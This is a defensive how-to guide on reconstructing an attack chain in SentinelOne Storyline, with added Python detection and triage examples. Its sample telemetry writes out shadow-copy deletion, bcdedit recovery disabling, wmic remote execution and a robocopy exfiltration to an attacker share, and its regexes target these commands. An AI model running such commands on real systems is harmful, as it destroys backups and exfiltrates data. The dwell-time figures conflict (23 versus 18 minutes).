SentinelOne Timeline Forensics and Attack Chain Analysis
HOWTO · Advanced

Dylan H.

Security Operations

February 11, 2026
6 min read

SCENARIO

Understanding the complete attack chain requires correlating hundreds of events (process creation, network connections, file modifications, registry changes) into a cohesive narrative. Traditional forensics tools require exporting logs and manually reconstructing timelines. Security analysts need visual, interactive attack chain analysis to quickly understand attack progression from initial access to final objectives.

Use this guide when you need to:

  • Visualize complete attack chains from initial compromise to final payload
  • Understand parent-child process relationships and lateral movement paths
  • Reconstruct incident timelines for forensic analysis or legal proceedings
  • Identify all affected systems and data exfiltration attempts
  • Determine attack dwell time (time between compromise and detection)
  • Generate visual attack diagrams for executive briefings

Business Impact:

  • Faster investigations: Visual timelines reduce investigation time from hours to minutes
  • Complete attack visibility: See entire attack chain, not just isolated events
  • Dwell time calculation: Measure time between compromise and detection
  • Executive communication: Visual diagrams explain complex attacks simply

SentinelOne Storyline provides visual attack chain reconstruction with interactive timelines, process trees, and network connection mapping.


REQUIREMENTS & ASSUMPTIONS

Prerequisites:

  • SentinelOne Singularity Complete license: Storyline included
  • Deep Visibility data: Full telemetry required for complete timelines

PROCESS

Step 1: Access Storyline for threat investigation

  1. Navigate to Console → Threats → [Threat Alert]

  2. Click "View Storyline" button

  3. Storyline interface displays:

    • Process Tree (left): Hierarchical view of parent-child processes
    • Timeline (center): Chronological events
    • Details Pane (right): Event metadata
    • Network Map (optional): Network connections visualized

Step 2: Analyze process execution tree

Example: Ransomware attack chain

Process Tree View:

explorer.exe (user: jdoe)
  └─ invoice.pdf.exe (malicious attachment executed by user)
       ├─ powershell.exe -encodedcommand ... (downloads payload)
       │    └─ malware.exe (ransomware binary)
       │         ├─ vssadmin.exe delete shadows /all (delete backups)
       │         ├─ wmic.exe shadowcopy delete (delete shadow copies)
       │         ├─ bcdedit.exe /set {default} recoveryenabled No (disable recovery)
       │         └─ [1,547 file encryption operations]
       └─ cmd.exe /c whoami && ipconfig (reconnaissance)

Key Observations:

  • Initial Access: User executed invoice.pdf.exe (phishing attachment)
  • Execution: Spawned PowerShell with encoded command (obfuscation)
  • Impact: Deleted backups, disabled recovery, encrypted 1,547 files
  • Dwell Time: 23 minutes from initial execution to encryption

Result: Complete attack chain visualized with parent-child relationships.
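The parent-child reasoning in the tree above can be reproduced outside the console. The following is an added example (not code from this guide or from SentinelOne): it rebuilds the chain from constructed process-creation records (assumed fields: pid, ppid, command line) and reports every backup-tampering process together with the stages its ancestry shows; the regexes and the sample command lines are assumptions modelled on the Step 2 tree.

```python
import re

# Constructed process-creation records mirroring the Step 2 tree:
# (pid, ppid, command line). Sample values, not real Storyline telemetry.
EVENTS = [
    (100, 1, "explorer.exe"),
    (200, 100, "invoice.pdf.exe"),
    (300, 200, "powershell.exe -encodedcommand QQBCAEMA"),
    (400, 300, "malware.exe"),
    (500, 400, "vssadmin.exe delete shadows /all"),
    (600, 400, "wmic.exe shadowcopy delete"),
    (700, 400, "bcdedit.exe /set {default} recoveryenabled No"),
    (800, 200, "cmd.exe /c whoami && ipconfig"),
]

# Backup/recovery tampering commands from the tree's Impact stage.
BACKUP_TAMPER = [
    re.compile(r"\bvssadmin(\.exe)?\s+delete\s+shadows", re.I),
    re.compile(r"\bwmic(\.exe)?\s+shadowcopy\s+delete", re.I),
    re.compile(r"\bbcdedit(\.exe)?\b.*\brecoveryenabled\s+no\b", re.I),
]
ENCODED_PS = re.compile(r"\bpowershell(\.exe)?\b.*\s-(e|ec|enc|encodedcommand)\b", re.I)
DOUBLE_EXT = re.compile(r"\.(pdf|docx?|xlsx?)\.exe\b", re.I)  # lure such as invoice.pdf.exe

def ancestry(by_pid, pid):
    """Command lines from the root process down to pid (root first)."""
    chain = []
    while pid in by_pid:
        ppid, cmd = by_pid[pid]
        chain.append(cmd)
        pid = ppid
    return chain[::-1]

def find_impact_chains(events):
    """One finding per backup-tampering process: its full parent chain and
    whether that chain shows the encoded-PowerShell and double-extension
    stages called out in Step 2's Key Observations."""
    by_pid = {pid: (ppid, cmd) for pid, ppid, cmd in events}
    findings = []
    for pid, _, cmd in events:
        if not any(p.search(cmd) for p in BACKUP_TAMPER):
            continue
        chain = ancestry(by_pid, pid)
        findings.append({
            "pid": pid, "impact_cmd": cmd,
            "chain": " -> ".join(c.split()[0] for c in chain),
            "encoded_powershell": any(ENCODED_PS.search(c) for c in chain),
            "double_extension_lure": any(DOUBLE_EXT.search(c) for c in chain),
        })
    return findings
```

Each finding carries the whole chain, so a single tamper command is never reviewed in isolation from the phishing lure that started it.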


Step 3: Analyze attack timeline

  1. Switch to Timeline view (horizontal timeline)

Timeline Events (chronological):

14:30:15 - User downloads invoice.pdf.exe (Email attachment)
14:32:00 - User executes invoice.pdf.exe (Double-click from Downloads)
14:32:05 - Process Creation: powershell.exe -enc [base64]
14:32:10 - Network Connection: powershell.exe → 198.51.100.75:443 (C2 server)
14:32:15 - File Creation: C:\ProgramData\malware.exe (payload downloaded)
14:32:20 - Process Creation: malware.exe (ransomware executes)
14:32:25 - Process Creation: vssadmin.exe delete shadows /all
14:33:00 - File Modification: C:\Users\jdoe\Documents\*.docx → *.locked (encryption begins)
14:45:30 - File Creation: C:\Users\jdoe\Desktop\README.txt (ransom note)
14:50:00 - SentinelOne Detection: Behavioral AI detects ransomware → Auto-quarantine

Key Metrics:

  • Time to Initial Access: 14:32:00 (user executed malicious file)
  • Time to Impact: 14:33:00 (encryption started)
  • Time to Detection: 14:50:00 (SentinelOne blocked)
  • Dwell Time: 18 minutes (initial access to detection)

Result: Precise timeline shows attack progression and detection speed.


Step 4: Map network connections and C2 communication

  1. Switch to Network Map view

Network Connections Visualized:

Endpoint: WKS-FINANCE-05 (10.1.50.22)
  ↓ Outbound Connection
198.51.100.75:443 (malicious-c2-server.com)
  - Protocol: HTTPS
  - Bytes Sent: 150 KB (likely encrypted commands)
  - Bytes Received: 5 MB (payload downloaded)
  - Duration: 30 seconds

Lateral Movement Attempt:
WKS-FINANCE-05 → WKS-FINANCE-10 (10.1.50.30)
  - Protocol: SMB (TCP 445)
  - Action: File copy attempt (blocked by SentinelOne)

IOCs Extracted:

  • Malicious IP: 198.51.100.75
  • Malicious Domain: malicious-c2-server.com
  • Payload URL: http://198.51.100.75/payload.exe

Result: Complete network activity mapped, C2 infrastructure identified.


Step 5: Identify lateral movement and data exfiltration

Lateral Movement Detection:

Look for:

  • Remote execution (PsExec, WMI, RDP connections)
  • File copy operations to other endpoints
  • Credential access (LSASS dumps, password spraying)

Example Storyline - Lateral Movement:

WKS-FINANCE-05 (compromised)
  └─ wmic.exe /node:WKS-FINANCE-10 process call create "malware.exe"
       └─ SMB Connection: \\WKS-FINANCE-10\C$\Windows\Temp\malware.exe (file staged)
            └─ Process Creation on WKS-FINANCE-10: malware.exe (successful lateral movement)

Data Exfiltration Detection:

Look for:

  • Large outbound transfers (>10 MB)
  • Cloud storage uploads (Dropbox, Google Drive)
  • FTP/SFTP connections
  • USB storage writes

Example Storyline - Data Exfiltration:

robocopy.exe C:\Confidential \\attacker-server\share /E /Z
  └─ Network Connection: 203.0.113.100:445 (attacker file server)
       └─ Bytes Sent: 2.3 GB (confidential data exfiltrated)

Result: Lateral movement paths and data theft identified.
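The "Look for" criteria above can be applied to connection records mechanically. This added example (not part of the guide, and not SentinelOne code) triages constructed connection records shaped like the Step 4 and Step 5 examples; the field names, the remote-execution port and process lists, and the RFC 1918 ranges used to decide what counts as internal are all assumptions.

```python
import ipaddress

# Thresholds and indicators taken from the Step 5 "Look for" lists.
EXFIL_BYTES = 10 * 1024 * 1024  # > 10 MB outbound
REMOTE_EXEC_PORTS = {445: "SMB", 135: "RPC/WMI", 3389: "RDP", 5985: "WinRM"}
REMOTE_EXEC_PROCS = {"wmic.exe", "psexec.exe", "mstsc.exe", "robocopy.exe", "powershell.exe"}
INTERNAL = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed connection records shaped like the Step 4 and Step 5 examples
# (assumed field names; sample values, not real Storyline export data).
CONNECTIONS = [
    {"host": "WKS-FINANCE-05", "proc": "powershell.exe", "dst": "198.51.100.75", "port": 443,
     "sent": 150 * 1024, "recv": 5 * 1024 * 1024},
    {"host": "WKS-FINANCE-05", "proc": "wmic.exe", "dst": "10.1.50.30", "port": 445,
     "sent": 2 * 1024 * 1024, "recv": 4096},
    {"host": "WKS-FINANCE-05", "proc": "robocopy.exe", "dst": "203.0.113.100", "port": 445,
     "sent": int(2.3 * 1024 ** 3), "recv": 0},
    {"host": "WKS-FINANCE-05", "proc": "outlook.exe", "dst": "10.1.10.5", "port": 443,
     "sent": 300 * 1024, "recv": 2 * 1024 * 1024},
]

def is_internal(ip):
    """True when the address falls in one of the assumed private ranges."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL)

def triage(conn):
    """Return the Step 5 categories a single connection record matches."""
    tags = []
    internal = is_internal(conn["dst"])
    # Lateral movement: remote-execution port on an internal host, from a tool that can do it.
    if internal and conn["port"] in REMOTE_EXEC_PORTS and conn["proc"] in REMOTE_EXEC_PROCS:
        tags.append(f"lateral_movement:{REMOTE_EXEC_PORTS[conn['port']]}")
    # Exfiltration: large outbound volume, or file-transfer protocols leaving the network.
    if not internal and conn["sent"] > EXFIL_BYTES:
        tags.append("exfiltration:large_outbound")
    if not internal and conn["port"] in (21, 22, 445):  # FTP / SFTP / SMB
        tags.append("exfiltration:file_transfer_to_external")
    return tags

def triage_all(conns):
    """Map each flagged destination (ip:port) to its tags; unflagged records are dropped."""
    out = {}
    for c in conns:
        tags = triage(c)
        if tags:
            out[f"{c['dst']}:{c['port']}"] = tags
    return out
```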


Step 6: Calculate attack dwell time

Dwell Time Definition: Time between initial compromise and detection/remediation.

How to Calculate from Storyline:

  1. Identify Initial Access Event: First malicious activity

    • Example: 2025-11-26 14:32:00 (user executed malware)
  2. Identify Detection Event: When SentinelOne detected threat

    • Example: 2025-11-26 14:50:00 (behavioral AI triggered)
  3. Calculate Dwell Time:

    Dwell Time = Detection Time - Initial Access Time
    Dwell Time = 14:50:00 - 14:32:00 = 18 minutes
    

Industry Benchmarks:

  • Average Dwell Time (2025): 21 days
  • Ransomware Dwell Time: 3-5 days
  • SentinelOne Automated Detection: Minutes to hours

Result: Quantify how quickly threats are detected and contained.
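The Step 3 metrics and the Step 6 dwell-time calculation above can be derived from the timeline text itself. This added example (not from the guide or SentinelOne) parses constructed lines in the "HH:MM:SS - Category: detail" layout shown in Step 3 and computes time to impact and dwell time; the event-matching patterns and the assumed date are choices made here, and a timeline whose clock wraps past midnight is handled since Storyline's rows show times without dates.

```python
import re
from datetime import datetime, timedelta

# Constructed sample timeline in the Step 3 format "HH:MM:SS - Category: detail" (not real output).
TIMELINE = """\
14:30:15 - User downloads invoice.pdf.exe (Email attachment)
14:32:00 - User executes invoice.pdf.exe (Double-click from Downloads)
14:32:05 - Process Creation: powershell.exe -enc [base64]
14:32:10 - Network Connection: powershell.exe -> 198.51.100.75:443 (C2 server)
14:32:20 - Process Creation: malware.exe (ransomware executes)
14:32:25 - Process Creation: vssadmin.exe delete shadows /all
14:33:00 - File Modification: C:\\Users\\jdoe\\Documents\\*.docx -> *.locked (encryption begins)
14:50:00 - SentinelOne Detection: Behavioral AI detects ransomware -> Auto-quarantine
"""
LINE = re.compile(r"^(\d{2}):(\d{2}):(\d{2}) - (.+)$")

def parse_timeline(text, day=datetime(2025, 11, 26)):
    """Return [(timestamp, description)]. Times carry no date, so a time that
    runs backwards is taken as crossing midnight and gets the next day."""
    events, prev = [], None
    for raw in text.splitlines():
        m = LINE.match(raw.strip())
        if not m:
            continue  # skip headings and blank lines
        h, mi, s = (int(x) for x in m.group(1, 2, 3))
        ts = day.replace(hour=h, minute=mi, second=s)
        if prev is not None and ts < prev:
            day += timedelta(days=1)
            ts += timedelta(days=1)
        events.append((ts, m.group(4)))
        prev = ts
    return events

def first(events, pattern):
    """Timestamp of the first event whose description matches, else None."""
    rx = re.compile(pattern, re.I)
    return next((ts for ts, desc in events if rx.search(desc)), None)

def dwell_metrics(events):
    """Step 6 key metrics in minutes, using the event types Step 3 names."""
    access = first(events, r"^User executes|^Process Creation: .*\.(pdf|docx?)\.exe")
    impact = first(events, r"^File Modification: .*\.locked")
    detect = first(events, r"^SentinelOne Detection")
    if access is None or detect is None:
        raise ValueError("timeline has no initial access or detection event")
    return {
        "initial_access": access, "first_impact": impact, "detection": detect,
        "time_to_impact_min": (impact - access).total_seconds() / 60 if impact else None,
        "dwell_time_min": (detect - access).total_seconds() / 60,
    }
```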


Step 7: Export timeline for forensic reports

  1. Click Export Timeline

  2. Select format:

    • PDF: Visual timeline diagram for reports
    • JSON: Machine-readable format for SIEM integration
    • CSV: Event list for spreadsheet analysis
  3. Generate forensic report:

    Report includes:
    - Complete event timeline
    - Process tree diagram
    - Network connection map
    - IOCs (file hashes, IPs, domains)
    - MITRE ATT&CK technique mappings
    
  4. Use report for:

    • Incident response documentation
    • Legal proceedings (chain of custody)
    • Executive briefings
    • Post-incident reviews

Result: Professional forensic report generated from Storyline data.


Step 8: Use Storyline for root cause analysis

Questions Storyline Answers:

  1. How did the attacker gain initial access?

    • Review earliest events in timeline
    • Common: Phishing attachment, exploit, credential theft
  2. What was the initial payload?

    • Identify first malicious file created/executed
    • Example: malware.exe downloaded via PowerShell
  3. What persistence mechanisms were created?

    • Search for:
      • Registry Run keys created
      • Scheduled tasks created
      • Services installed
  4. Was data exfiltrated?

    • Review network connections for large uploads
    • Check for file staging operations
  5. Which systems were compromised?

    • Trace lateral movement attempts
    • Identify all endpoints with related threats

Result: Complete incident root cause analysis from visual timeline.


VERIFICATION

Verify Storyline is operational:

  1. Navigate to any threat: Console → Threats → [Threat]
  2. Click "View Storyline"
  3. Verify timeline displays: Process tree, events, timestamps visible

TROUBLESHOOTING

Issue: Storyline shows incomplete data

Solutions:

  1. Check data retention: Events older than retention period won't display
  2. Verify agent was online: Offline endpoints don't send telemetry
  3. Wait for data ingestion: Recent events may take 1-2 minutes to appear

Issue: Cannot export timeline

Solutions:

  1. Check browser pop-up blocker: May block PDF download
  2. Verify permissions: User must have Report Export permissions

Document Version: 1.0 Last Updated: 2025-11-26
